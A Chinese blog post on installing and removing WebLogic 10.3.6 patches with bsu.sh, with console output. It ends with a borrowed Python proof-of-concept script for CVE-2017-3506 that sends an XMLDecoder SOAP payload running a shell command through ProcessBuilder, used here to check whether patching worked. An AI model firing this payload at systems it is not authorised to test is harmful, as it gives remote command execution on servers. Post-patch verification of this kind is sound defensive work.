weblogic虽然是大牌oracle的重量级中间件，但是也还是会时不时爆出一些漏洞的，这些漏洞如果不及时打补丁补救，很快会被一些黑客拿来去一些网站换积分或者当挂马做肉鸡。废话不多说，因为weblogic打补丁的方式基本都是一个套路，这里记录下weblogic的打补丁方法。
1、环境

{MW_HOME} = /usr/local/bea
{WL_HOME} = /usr/local/bea/wlserver_10.3

下面使用{MW_HOME}和{WL_HOME}代替真正的路径
2、将补丁文件拷贝至{MW_HOME}/utils/bsu/cache_dir下并解压，通常会得到一个jar包和一个patch-catalog_xxxxx.xml这样的文件以及一个readme文档（英文好的完全可以看readme文档搞定、、、）
3、进入{MW_HOME}/utils/bsu/目录修改bsu.sh中内存参数为MEM_ARGS="-Xms1500m -Xmx1500m"，这里内存大小视不同的补丁会有区别，过小的话会报错，不缺内存的话建议直接改大一点
4、执行安装补丁命令

bsu.sh -install -patch_download_dir={MW_HOME}/utils/bsu/cache_dir -patchlist={PATCH_ID} -prod_dir={WL_HOME}

粘贴格式可能会有问题，报错就手敲一遍、
5、这里是漫长的等待，漫长等待的结果有两种，一种是安装成功

Checking for conflicts............
No conflict(s) detected

Installing Patch ID: FMJJ..
Result: Success

另一种是补丁冲突~~

Checking for conflicts...........
Conflict(s) detected - resolve conflict condition and execute patch installation again
Conflict condition details follow:
Patch FMJJ is mutually exclusive and cannot coexist with patch(es): EJUW,ZLNA

这里提示看到该补丁和之前打的补丁EJUW和ZLNA相冲突，这时候就需要先卸载之前安装的补丁才能继续进行安装、
执行命令

./bsu.sh -remove -verbose -patchlist=EJUW -prod_dir={WL_HOME}

这里又是漫长的等待，weblogic会检测卸载是否有依赖，类似这种跟2个或以上补丁冲突的随便找一个（建议先删列表中的最后一个补丁、），然后漫长的等待之后系统会提示你想删除这个补丁还要先删除xxx补丁才行、、、

Checking for conflicts.......
Conflict(s) detected - resolve conflict condition and execute patch removal again
Conflict condition details follow:
The selected patch cannot be removed until the following patch(es) are removed first: ZLNA

然后只能按weblogic说的滚去挨个删完

Checking for conflicts...........
No conflict(s) detected

Starting removal of Patch ID: EJUW
Removing /usr/local/bea/modules/com.bea.core.weblogic.stax_1.11.0.0.jar
Removing /usr/local/bea/wlserver_10.3/server/lib/wlt3jmsclient.jar
Removing /usr/local/bea/wlserver_10.3/server/lib/wlt3client.jar
Removing /usr/local/bea/modules/com.bea.core.stax2_2.0.0.0_3-0-3.jar
Removing /usr/local/bea/wlserver_10.3/bugsfixed/WLS-PSU-bugsfixed.txt
Removing /usr/local/bea/wlserver_10.3/bugsfixed/20780171-WLS-10.3.6.0.12_PSU_WebServices-ClientSide-Configuration-README.txt
Restoring /usr/local/bea/wlserver_10.3/server/lib/consoleapp/APP-INF/lib/commons-fileupload.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/wljmxclient.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/modules/com.oracle.cie.config-wls-schema_10.3.6.0.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/common/wlst/modules/jython-modules.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/common/bin/wlsifconfig.sh from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/wlstestclient.ear from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/wlthint3client.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/modules/com.bea.core.utils.full_1.10.0.0.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/modules/com.bea.core.bea.opensaml_1.0.0.0_6-2-0-0.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/modules/ws.databinding_1.3.0.0.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/common/deployable-libraries/jsf-2.0.war from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/schema/weblogic-domain-binding.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/webserviceclient+ssl.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/wlw-langx.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/wljmsclient.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/wlsafclient.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/modules/com.bea.core.apache_1.3.0.1.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/wlsaft3client.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/wseeclient.zip from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/modules/com.bea.core.common.security.saml2_1.0.0.0_6-2-0-0.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/modules/glassfish.jstl_1.2.0.1.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/wls-api.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/common/deployable-libraries/jsf-1.2.war from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/common/deployable-libraries/jstl-1.2.war from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/modules/com.bea.core.descriptor.wl.binding_1.4.0.0.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/modules/com.oracle.cie.config-wls_7.2.0.0.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/jms-notran-adp.rar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/jms-xa-adp.rar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/jdbcdrivers.xml from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/uddiexplorer.war from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/modules/ws.databinding.plugins_1.3.0.0.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/webserviceclient.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/wlclient.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/wseeclient.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/modules/com.bea.core.utils_1.10.0.0.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/wlserver_10.3/server/lib/consoleapp/webapp/WEB-INF/lib/console.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Restoring /usr/local/bea/modules/com.bea.core.bea.opensaml2_1.0.0.0_6-2-0-0.jar from /usr/local/bea/patch_wls1036/backup/backup.jar
Removing /usr/local/bea/patch_wls1036/patch_jars/BUG20780171_1036012.jar
Removing /usr/local/bea/patch_wls1036/patch_jars/com.bea.core.apache.commons.fileupload_1.0.0.0_1-3-1.jar
Removing /usr/local/bea/patch_wls1036/patch_jars/com.bea.core.stax2_2.0.0.0_3-0-3.jar
Removing /usr/local/bea/patch_wls1036/patch_jars/glassfish.jaxb.xjc_1.2.0.0_2-1-14.jar
Removing /usr/local/bea/patch_wls1036/patch_jars/glassfish.jaxb_1.2.0.0_2-1-14.jar
Removing /usr/local/bea/patch_wls1036/patch_jars/glassfish.jaxp_1.4.5.0.jar
Removing /usr/local/bea/patch_wls1036/patch_jars/glassfish.jaxws.mimepull_1.1.0.0_1-3-8.jar
Updating /usr/local/bea/patch_wls1036/profiles/default/sys_manifest_classpath/weblogic_patch.jar
Old manifest value: Class-Path= ../../../patch_jars/BUG20780171_1036012.jar ../../../patch_jars/com.bea.core.apache.commons.fileupload_1.0.0.0_1-3-1.jar ../../../patch_jars/com.bea.core.stax2_2.0.0.0_3-0-3.jar ../../../patch_jars/glassfish.jaxb.xjc_1.2.0.0_2-1-14.jar ../../../patch_jars/glassfish.jaxb_1.2.0.0_2-1-14.jar ../../../patch_jars/glassfish.jaxp_1.4.5.0.jar ../../../patch_jars/glassfish.jaxws.mimepull_1.1.0.0_1-3-8.jar
New manifest value: Class-Path=
Result: Success

然后继续安装，这时候就只会出现成功了

Checking for conflicts............
No conflict(s) detected

Installing Patch ID: FMJJ..
Result: Success

6、查看weblogic的补丁列表中是否已出现刚才安装的补丁

[bsu]# ./bsu.sh -prod_dir=/usr/local/bea/wlserver_10.3 -status=applied -verbose -view
ProductName:       WebLogic Server
ProductVersion:    10.3 MP6
Components:        WebLogic Server/Core Application Server,WebLogic Server/Admi
                   nistration Console,WebLogic Server/Configuration Wizard and 
                   Upgrade Framework,WebLogic Server/Web 2.0 HTTP Pub-Sub Serve
                   r,WebLogic Server/WebLogic SCA,WebLogic Server/WebLogic JDBC
                    Drivers,WebLogic Server/Third Party JDBC Drivers,WebLogic S
                   erver/WebLogic Server Clients,WebLogic Server/WebLogic Web S
                   erver Plugins,WebLogic Server/UDDI and Xquery Support,WebLog
                   ic Server/Evaluation Database,WebLogic Server/Workshop Code 
                   Completion Support
BEAHome:           /usr/local/bea
ProductHome:       /usr/local/bea/wlserver_10.3
PatchSystemDir:    /usr/local/bea/utils/bsu
PatchDir:          /usr/local/bea/patch_wls1036
Profile:           Default
DownloadDir:       /usr/local/bea/utils/bsu/cache_dir
JavaVersion:       1.6.0_29
JavaVendor:        Sun


Patch ID:          FMJJ
PatchContainer:    FMJJ.jar
Checksum:          591477727
Severity:          optional
Category:          General
CR/BUG:            26519424
Restart:           true
Description:       WLS PATCH SET UPDATE 10.3.6.0.171017
WLS PATCH SET UPDATE 10
                   .3.6.0.171017

7、根据已有的POC脚本或者其他方式检测漏洞是否还在
这里是本次漏洞CEV-2017-3506对应的Python检测脚本，大神的博客扒来用下，勿怪勿怪~

#!/usr/bin/env python
# coding:utf-8
# auther:dayu(大神的签名)
import requests
import re
from sys import argv

heads = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
    'Content-Type': 'text/xml;charset=UTF-8'
    }

def poc(url):
    if not url.startswith("http"):
        url = "http://" + url
    if "/" in url:
        url += '/wls-wsat/CoordinatorPortType'
    post_str = '''
    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
      <soapenv:Header>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
          <java>
            <object class="java.lang.ProcessBuilder">
              <array class="java.lang.String" length="3">
                <void index="0">
                  <string>/bin/bash</string>
                </void>
                <void index="1">
                  <string>-c</string>
                </void>
                <void index="2">
                  <string>ls</string>
                </void>
              </array>
              <void method="start"/>
            </object>
          </java>
        </work:WorkContext>
      </soapenv:Header>
      <soapenv:Body/>
    </soapenv:Envelope>
    '''

    try:
        response = requests.post(url, data=post_str, verify=False, timeout=5, headers=heads)
        response = response.text
        response = re.search(r"\<faultstring\>.*\<\/faultstring\>", response).group(0)
    except Exception, e:
        response = ""

    if '<faultstring>java.lang.ProcessBuilder' in response or "<faultstring>0" in response:
        result = "Vulnerability exist"
        return result
    else:
        result = "No Vulnerability"
        return result


if __name__ == '__main__':
    if len(argv) == 1:
        print "python 参数 url:port"
        exit(0)
    else:
        url = argv[1]
    result = poc(url=url)
    print result

ps:本次记录是借用安装CEV-2017-3506补丁的机会，安装的补丁ID：FMJJ，安装冲突ID列表：ZLNA，EJUW。
本人用Python写了一个简单的自动打补丁脚本（虽然打补丁命令不多也不复杂，但是扛不住每个命令都要执行20几分钟，几条命令执行下来还是相当的耗时，还是写了脚本，也适合多台机器的安装），由于python技术有限，代码就不拿来献丑了，有需要的可以私聊我0.0